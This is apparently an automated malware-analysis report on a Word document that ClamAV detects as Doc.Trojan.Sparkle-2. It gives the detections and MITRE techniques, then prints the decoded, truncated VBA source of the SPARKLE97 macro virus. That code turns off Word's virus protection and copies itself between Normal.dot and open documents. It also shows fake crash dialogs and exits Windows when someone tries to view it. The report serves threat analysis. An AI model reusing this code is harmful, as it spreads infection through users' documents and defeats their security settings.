MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The macro code, specifically the 'Sparkle' subroutine, attempts to copy itself and associated user forms ('userform999', 'userform900') from the Normal template to the active document. This behavior is indicative of macro-based malware designed for persistence or propagation. The ClamAV detections 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Sparkle-2' further support the malicious nature of the file.
Heuristics (2)
- ClamAV: Doc.Trojan.Beauty-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Beauty-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16108 bytes |

SHA-256: 0ff9aac1a69629dda42ecd5605df0cb5e276c0e4c96aef6c9dd9b5b258d6dc85
Detection (ClamAV): Doc.Trojan.Sparkle-2
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Sparkle"
Sub FileSave()
On Error GoTo Error
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Sparkle" Then
DocumentInstalled = True
End If
Next
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(J).Name = "Sparkle" Then
GlobalInstalled = True
End If
Next
If DocumentInstalled = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "SPARKLE97"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Eifel Epidemic"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus Was Made By Talon"
End With
End If
If GlobalInstalled = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
End If
Sparkle
Error:
End Sub
Sub Toolsmacro()
On Error GoTo Error
userform999.Show
Error:
End Sub
Sub Filetemplates()
On Error GoTo Error
userform900.Show
Error:
End Sub
Sub Sparkle()
On Error GoTo Error
If WeekDay(Now()) = 2 And Hour(Now()) = 9 Then
With ActiveDocument.Content
.Font.Animation = wdAnimationSparkleText
Application.StatusBar = True
StatusBar = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
Application.Caption = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
Error:
End Sub
Sub ViewVbCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Tasks.ExitWindows
End Sub
Attribute VB_Name = "userform999"
Attribute VB_Base = "0{77DA0ACF-C32C-11D0-B4FA-444553540000}{77DA0AC9-C32C-11D0-B4FA-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ListBox2_Click()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Unload userform999
End Sub
Private Sub UserForm_Initialize()
ComboBox1.AddItem "Normal.dot(global template)"
End Sub
Private Sub CommandButton2_Click()
Unload userform999
End Sub
Private Sub CommandButton5_Click()
MsgBox "This program has performed an illegal operation and will shut down.
... (truncated)